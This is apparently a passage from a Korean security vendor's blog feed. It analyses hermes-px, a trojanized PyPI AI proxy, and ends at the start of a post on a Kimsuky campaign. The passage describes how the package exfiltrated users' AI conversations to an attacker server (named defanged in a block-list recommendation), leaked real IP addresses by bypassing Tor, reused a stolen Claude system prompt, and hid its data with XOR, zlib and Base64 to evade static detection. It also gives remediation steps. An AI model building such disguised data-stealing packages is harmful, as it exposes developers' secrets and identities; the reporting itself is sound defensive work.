&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1009&quot; data-origin-height=&quot;249&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/HhMCC/dJMcaiCSzQG/ROdsC04IRsZVmrMxBjTLi0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/HhMCC/dJMcaiCSzQG/ROdsC04IRsZVmrMxBjTLi0/img.png&quot; data-alt=&quot;[그림 2] 응답 위조 코드 (출처: JFrog)&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/HhMCC/dJMcaiCSzQG/ROdsC04IRsZVmrMxBjTLi0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FHhMCC%2FdJMcaiCSzQG%2FROdsC04IRsZVmrMxBjTLi0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1009&quot; height=&quot;249&quot; data-origin-width=&quot;1009&quot; data-origin-height=&quot;249&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 2] 응답 위조 코드 (출처: JFrog)&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;Claude&amp;nbsp;내부&amp;nbsp;시스템&amp;nbsp;프롬프트&amp;nbsp;탈취&amp;nbsp;및&amp;nbsp;재활용&lt;/b&gt;&amp;nbsp; &lt;br /&gt;패키지 내부에는 base_prompt.pz 라는 압축 파일이 숨겨져 있으며, 압축파일 내부에는 24만 6천 자(246,000자) 분량의 시스템 프롬프트가 존재합니다.&amp;nbsp; &lt;br /&gt;분석&amp;nbsp;결과&amp;nbsp;이는&amp;nbsp;최근&amp;nbsp;유출된&amp;nbsp;Anthropic의&amp;nbsp;AI&amp;nbsp;서비스&amp;nbsp;Claude&amp;nbsp;Code의&amp;nbsp;내부&amp;nbsp;시스템&amp;nbsp;프롬프트를&amp;nbsp;탈취해&amp;nbsp;변조한&amp;nbsp;것으로&amp;nbsp;확인되었습니다.&amp;nbsp;&lt;br /&gt;&lt;br /&gt;공격자는&amp;nbsp;원문의&amp;nbsp;'Claude'를&amp;nbsp;'AXIOM-1'로,&amp;nbsp;'Anthropic'을&amp;nbsp;'EGen&amp;nbsp;Labs'로&amp;nbsp;일괄&amp;nbsp;교체를&amp;nbsp;시도했으나&amp;nbsp;작업이&amp;nbsp;불완전하게&amp;nbsp;이루어졌습니다.&amp;nbsp;'Claude'&amp;nbsp;6곳,&amp;nbsp;'Anthropic'&amp;nbsp;2곳이&amp;nbsp;원문&amp;nbsp;그대로&amp;nbsp;남아&amp;nbsp;있었고,&amp;nbsp;recommend_claude_apps&amp;nbsp;같은&amp;nbsp;Claude&amp;nbsp;고유의&amp;nbsp;내부&amp;nbsp;함수명,&amp;nbsp;/mnt/user-data/uploads&amp;nbsp;같은&amp;nbsp;전용&amp;nbsp;파일&amp;nbsp;경로&amp;nbsp;등도&amp;nbsp;그대로&amp;nbsp;포함되어&amp;nbsp;있어&amp;nbsp;출처를&amp;nbsp;확인할&amp;nbsp;수&amp;nbsp;있었습니다.&amp;nbsp; &lt;br /&gt;이&amp;nbsp;프롬프트는&amp;nbsp;사용자의&amp;nbsp;API&amp;nbsp;요청마다&amp;nbsp;함께&amp;nbsp;주입되어,&amp;nbsp;EGen&amp;nbsp;Labs가&amp;nbsp;자체&amp;nbsp;개발한&amp;nbsp;독자적인&amp;nbsp;AI인&amp;nbsp;것처럼&amp;nbsp;포장하는&amp;nbsp;데&amp;nbsp;활용되었습니다.&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1435&quot; data-origin-height=&quot;735&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bGTax2/dJMcafsCZ0O/VtwEhudq7l92dQeR1MKzQ0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bGTax2/dJMcafsCZ0O/VtwEhudq7l92dQeR1MKzQ0/img.png&quot; data-alt=&quot;[그림 3] 변조된 프롬프트(좌) 원문 프롬프트(우) 비교 (출처: JFrog)&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bGTax2/dJMcafsCZ0O/VtwEhudq7l92dQeR1MKzQ0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbGTax2%2FdJMcafsCZ0O%2FVtwEhudq7l92dQeR1MKzQ0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1435&quot; height=&quot;735&quot; data-origin-width=&quot;1435&quot; data-origin-height=&quot;735&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 3] 변조된 프롬프트(좌) 원문 프롬프트(우) 비교 (출처: JFrog)&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;익명성&amp;nbsp;약속을&amp;nbsp;역이용한&amp;nbsp;IP&amp;nbsp;주소&amp;nbsp;탈취&lt;/b&gt;&amp;nbsp; &lt;br /&gt;패키지가 가장 강조한 기능은 Tor를 통한 익명성 보장이었으나, 실제로 AI 요청은 Tor를 경유했지만, 사용자의 대화를 공격자 서버로 전송하는 과정은 Tor를 전혀 거치지 않고 사용자의 실제 인터넷 연결로 직접 이루어졌습니다. &lt;br /&gt;결과적으로 익명성을 약속한 패키지가 오히려 사용자의 실제 IP 주소를 공격자에게 넘겨주는 구조였습니다. 소스코드 안에는 이를 의도적으로 설계했음을 드러내는 주석이 남아 있었습니다.&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;background-color: #ffffff; border: 1px solid #ced4da; border-radius: 8px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 4px rgba(0,0,0,0.05);&quot;&gt;
&lt;p style=&quot;margin: 0; color: #212529;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;//&lt;/span&gt;&lt;span&gt;Direct&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;request&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;bypasses&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;the&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;Tor&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;session&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;to&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;avoid&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;proxy&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;overhead&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;3중&amp;nbsp;난독화로&amp;nbsp;탐지&amp;nbsp;회피&amp;nbsp;&lt;/b&gt; &lt;br /&gt;서버&amp;nbsp;주소,&amp;nbsp;인증&amp;nbsp;정보,&amp;nbsp;시스템&amp;nbsp;프롬프트&amp;nbsp;등&amp;nbsp;패키지&amp;nbsp;내&amp;nbsp;모든&amp;nbsp;민감한&amp;nbsp;데이타는&amp;nbsp;XOR&amp;nbsp;암호화(210바이트&amp;nbsp;순환&amp;nbsp;키)&amp;nbsp;&amp;rarr;&amp;nbsp;zlib&amp;nbsp;압축&amp;nbsp;&amp;rarr;&amp;nbsp;Base64&amp;nbsp;인코딩의&amp;nbsp;3단계를&amp;nbsp;거쳐&amp;nbsp;숨겨졌습니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;파일&amp;nbsp;어디에도&amp;nbsp;읽을&amp;nbsp;수&amp;nbsp;있는&amp;nbsp;형태의&amp;nbsp;악성&amp;nbsp;URL이나&amp;nbsp;키가&amp;nbsp;존재하지&amp;nbsp;않으며,&amp;nbsp;모든&amp;nbsp;값은&amp;nbsp;실행&amp;nbsp;중&amp;nbsp;메모리에서만&amp;nbsp;복호화됩니다.&amp;nbsp;&amp;nbsp; &lt;br /&gt;파일을&amp;nbsp;열어&amp;nbsp;문자열을&amp;nbsp;직접&amp;nbsp;검사하는&amp;nbsp;정적&amp;nbsp;분석&amp;nbsp;방식으로는&amp;nbsp;탐지가&amp;nbsp;사실상&amp;nbsp;어려운&amp;nbsp;구조입니다.&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h2 style=&quot;border-left: 8px solid #000000; padding: 12px 20px; background-color: #f8f9fa; color: #1a1a1a; font-weight: bold; font-size: 22px; margin: 30px 0 15px 0; border-bottom: 1px solid #e0e0e0; font-family: 'Pretendard', sans-serif; letter-spacing: -0.5px;&quot; data-ke-size=&quot;size26&quot;&gt;피해 범위&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;hermes-px를&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;설치하고 사용한 개발자라면 다음과 같은 피해가 발생했을 수 있습니다.&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;div style=&quot;background-color: #ffffff; border: 1px solid #ced4da; border-radius: 8px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 4px rgba(0,0,0,0.05);&quot;&gt;
&lt;div style=&quot;background-color: #ffffff; color: #000000; text-align: start;&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li data-aria-level=&quot;1&quot; data-aria-posinset=&quot;1&quot; data-list-defn-props=&quot;{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559683&amp;quot;:0,&amp;quot;335559684&amp;quot;:-2,&amp;quot;335559685&amp;quot;:800,&amp;quot;335559991&amp;quot;:400,&amp;quot;469769226&amp;quot;:&amp;quot;Symbol&amp;quot;,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;hybridMultilevel&amp;quot;}&quot; data-listid=&quot;7&quot; data-font=&quot;Symbol&quot; data-leveltext=&quot;&quot;&gt;&lt;span data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&lt;b&gt;대화 내용 전체 탈취&lt;/b&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;AI에&amp;nbsp;입력한 모든 프롬프트와 응답이 공격자 서버에 수집되기 때문에&amp;nbsp;소스코드, API 키, 내부 시스템 주소, 고객 정보 등 업무상 민감한 내용이 포함되었을 가능성이 있습니다.&lt;/li&gt;
&lt;li data-aria-level=&quot;1&quot; data-aria-posinset=&quot;1&quot; data-list-defn-props=&quot;{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559683&amp;quot;:0,&amp;quot;335559684&amp;quot;:-2,&amp;quot;335559685&amp;quot;:800,&amp;quot;335559991&amp;quot;:400,&amp;quot;469769226&amp;quot;:&amp;quot;Symbol&amp;quot;,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;hybridMultilevel&amp;quot;}&quot; data-listid=&quot;7&quot; data-font=&quot;Symbol&quot; data-leveltext=&quot;&quot;&gt;&lt;span style=&quot;background-color: #c6c6c6;&quot; data-ccp-props=&quot;{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;134245417&amp;quot;:false,&amp;quot;335551550&amp;quot;:0,&amp;quot;335551620&amp;quot;:0,&amp;quot;335559685&amp;quot;:800,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0}&quot;&gt;&lt;b&gt; &lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;실제 IP 주소 노출&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot;&gt;&lt;b&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;익명성을 약속한 패키지가 실제로는 사용자의 IP 주소를 공격자에게 그대로 전달했습니다.&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li data-aria-level=&quot;1&quot; data-aria-posinset=&quot;1&quot; data-list-defn-props=&quot;{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559683&amp;quot;:0,&amp;quot;335559684&amp;quot;:-2,&amp;quot;335559685&amp;quot;:800,&amp;quot;335559991&amp;quot;:400,&amp;quot;469769226&amp;quot;:&amp;quot;Symbol&amp;quot;,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;hybridMultilevel&amp;quot;}&quot; data-listid=&quot;7&quot; data-font=&quot;Symbol&quot; data-leveltext=&quot;&quot;&gt;&lt;span style=&quot;background-color: #c6c6c6;&quot; data-ccp-props=&quot;{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;134245417&amp;quot;:false,&amp;quot;335551550&amp;quot;:0,&amp;quot;335551620&amp;quot;:0,&amp;quot;335559685&amp;quot;:800,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0}&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&lt;b&gt; &lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;2차 악성 코드 실행 가능성&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;README의 안내에 따라 GitHub 스크립트를 실행한 경우, 추가 악성 페이로드가 설치되었을 수 있습니다.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li data-aria-level=&quot;1&quot; data-aria-posinset=&quot;1&quot; data-list-defn-props=&quot;{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559683&amp;quot;:0,&amp;quot;335559684&amp;quot;:-2,&amp;quot;335559685&amp;quot;:800,&amp;quot;335559991&amp;quot;:400,&amp;quot;469769226&amp;quot;:&amp;quot;Symbol&amp;quot;,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;hybridMultilevel&amp;quot;}&quot; data-listid=&quot;7&quot; data-font=&quot;Symbol&quot; data-leveltext=&quot;&quot;&gt;&lt;span style=&quot;background-color: #c6c6c6;&quot; data-ccp-props=&quot;{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;134245417&amp;quot;:false,&amp;quot;335551550&amp;quot;:0,&amp;quot;335551620&amp;quot;:0,&amp;quot;335559685&amp;quot;:800,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0}&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&lt;b&gt; &lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;대학 인프라 무단 사용&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot;&gt;&lt;b&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;직접 설치한 개발자뿐 아니라, 패키지가 무단으로 사용한&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;Universit&lt;/span&gt;&lt;span&gt;e&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;Central&lt;/span&gt;&lt;span&gt;e&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;역시 자체 인프라를&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;도용당하&lt;/span&gt;&lt;span&gt;는&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;피해를 입었습니다.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h2 style=&quot;border-left: 8px solid #000000; padding: 12px 20px; background-color: #f8f9fa; color: #1a1a1a; font-weight: bold; font-size: 22px; margin: 30px 0 15px 0; border-bottom: 1px solid #e0e0e0; font-family: 'Pretendard', sans-serif; letter-spacing: -0.5px;&quot; data-ke-size=&quot;size26&quot;&gt;대응 권고&amp;nbsp;&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;hermes-px를&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;설치한 적이 있다면 즉시 아래 조치를 취하시기 바랍니다.&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;div style=&quot;background-color: #ffffff; border: 1px solid #ced4da; border-radius: 8px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 4px rgba(0,0,0,0.05);&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;패키지&amp;nbsp;즉시&amp;nbsp;삭제&amp;nbsp;&lt;/b&gt;&lt;br /&gt;터미널에서 pip uninstall hermes-px를 실행합니다.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;자격&amp;nbsp;증명&amp;nbsp;전면&amp;nbsp;교체&amp;nbsp;&lt;/b&gt;&lt;br /&gt;패키지를 통해 전달한 내용에 포함되었을 수 있는 API 키, 비밀번호, 내부 토큰 등을 모두 폐기하고 재발급합니다.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;대화&amp;nbsp;내용&amp;nbsp;전수&amp;nbsp;점검&amp;nbsp;&lt;/b&gt;&lt;br /&gt;해당 패키지를 통해 오간 모든 메시지는 공격자에게 수집된 것으로 간주하고, 민감한 정보 포함 여부를 검토해야 합니다.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;악성&amp;nbsp;도메인&amp;nbsp;차단&amp;nbsp;&lt;/b&gt;&lt;br /&gt;공격자 서버인 urlvoelpilswwxkiosey[.]supabase[.]co로의 접속을 네트워크 수준에서 차단하고 통신 시도를 모니터링합니다.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Tor&amp;nbsp;구성&amp;nbsp;요소&amp;nbsp;제거&amp;nbsp;&lt;/b&gt;&lt;br /&gt;이번&amp;nbsp;패키지&amp;nbsp;설치&amp;nbsp;과정에서&amp;nbsp;Tor가&amp;nbsp;함께&amp;nbsp;설치된&amp;nbsp;경우&amp;nbsp;제거하는&amp;nbsp;것이&amp;nbsp;안전합니다.&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #ffffff; color: #000000; text-align: start;&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;background-color: #ffffff; color: #000000; text-align: start;&quot;&gt;
&lt;p style=&quot;color: #000000; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;이번 악성 패키지 공격은 AI 개발 도구에 대한 수요를 겨냥한 공급망 공격이 얼마나 정교하게 설계될 수 있는지를 잘 보여주는 사례라 할 수 있습니다.&amp;nbsp;기술적&amp;nbsp;복잡성보다&amp;nbsp;사용자의&amp;nbsp;신뢰를&amp;nbsp;단계적으로&amp;nbsp;구축하는&amp;nbsp;방식으로&amp;nbsp;설계되었으며,&amp;nbsp;실제로&amp;nbsp;동작하는&amp;nbsp;AI&amp;nbsp;기능을&amp;nbsp;제공해&amp;nbsp;의심을&amp;nbsp;차단했다는&amp;nbsp;점이&amp;nbsp;특징적입니다.&amp;nbsp; &lt;br /&gt;&lt;br /&gt;특히 AI 서비스의 내부 시스템 프롬프트가 탈취되어 악성 패키지의 구성 요소로 재활용된 사실은,&amp;nbsp; AI 자산 보호와 공급망 보안 관리의 중요성을 다시 한번 상기시켜 줍니다.&amp;nbsp;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #000000; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;오픈소스&amp;nbsp;패키지를&amp;nbsp;도입할&amp;nbsp;때는&amp;nbsp;편리함보다&amp;nbsp;검증을&amp;nbsp;우선하는&amp;nbsp;습관이&amp;nbsp;필요합니다.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #9d9d9d;&quot;&gt;[참고]&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #9d9d9d;&quot;&gt; &lt;span style=&quot;background-color: #ffffff; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;a style=&quot;color: #9d9d9d;&quot; href=&quot;https://cybersecuritynews.com/trojanized-pypi-ai-proxy-uses-stolen-claude-prompt/&quot;&gt;https://cybersecuritynews.com/trojanized-pypi-ai-proxy-uses-stolen-claude-prompt/&lt;/a&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; text-align: left;&quot;&gt;&amp;nbsp;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;a style=&quot;color: #9d9d9d;&quot; href=&quot;https://research.jfrog.com/post/hermes-px-pypi/&quot;&gt;https://research.jfrog.com/post/hermes-px-pypi/&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;</description>
      <category>국내외 보안동향</category>
      <author>알약4</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5744</guid>
      <comments>https://alyacofficialblog.tistory.com/5744#entry5744comment</comments>
      <pubDate>Wed, 8 Apr 2026 15:43:18 +0900</pubDate>
    </item>
    <item>
      <title>GitLab 플렛폼을 이용한 Kimsuky 공격 사례</title>
      <link>https://alyacofficialblog.tistory.com/5743</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1536&quot; data-origin-height=&quot;1024&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ecUMu6/dJMb99MDA6I/msBpltM12CfsE9T1i2eeZk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ecUMu6/dJMb99MDA6I/msBpltM12CfsE9T1i2eeZk/img.png&quot; data-alt=&quot;[이미지] 생성형 AI 제작&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ecUMu6/dJMb99MDA6I/msBpltM12CfsE9T1i2eeZk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FecUMu6%2FdJMb99MDA6I%2FmsBpltM12CfsE9T1i2eeZk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1536&quot; height=&quot;1024&quot; data-origin-width=&quot;1536&quot; data-origin-height=&quot;1024&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[이미지] 생성형 AI 제작&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;이스트시큐리티&lt;/span&gt; &lt;span&gt;대응센터&lt;/span&gt;&lt;span&gt;(ESRC)&lt;/span&gt;&lt;span&gt;에서&lt;/span&gt; &lt;span&gt;운영&lt;/span&gt; &lt;span&gt;중인&lt;/span&gt;&lt;span&gt; APT TDS(Threat Detection System)&lt;/span&gt;&lt;span&gt;에서는&lt;/span&gt; &lt;span&gt;최근&lt;/span&gt; &lt;span&gt;이력서&lt;/span&gt; &lt;span&gt;및&lt;/span&gt; &lt;span&gt;대북&lt;/span&gt; &lt;span&gt;정책&lt;/span&gt; &lt;span&gt;문서로&lt;/span&gt; &lt;span&gt;위장한&lt;/span&gt; &lt;span&gt;악성&lt;/span&gt;&lt;span&gt; LNK(&lt;/span&gt;&lt;span&gt;바로가기&lt;/span&gt;&lt;span&gt;) &lt;/span&gt;&lt;span&gt;파일의&lt;/span&gt; &lt;span&gt;유포&lt;/span&gt; &lt;span&gt;정황을&lt;/span&gt; &lt;span&gt;포착했습니다&lt;/span&gt;&lt;span&gt;. &lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
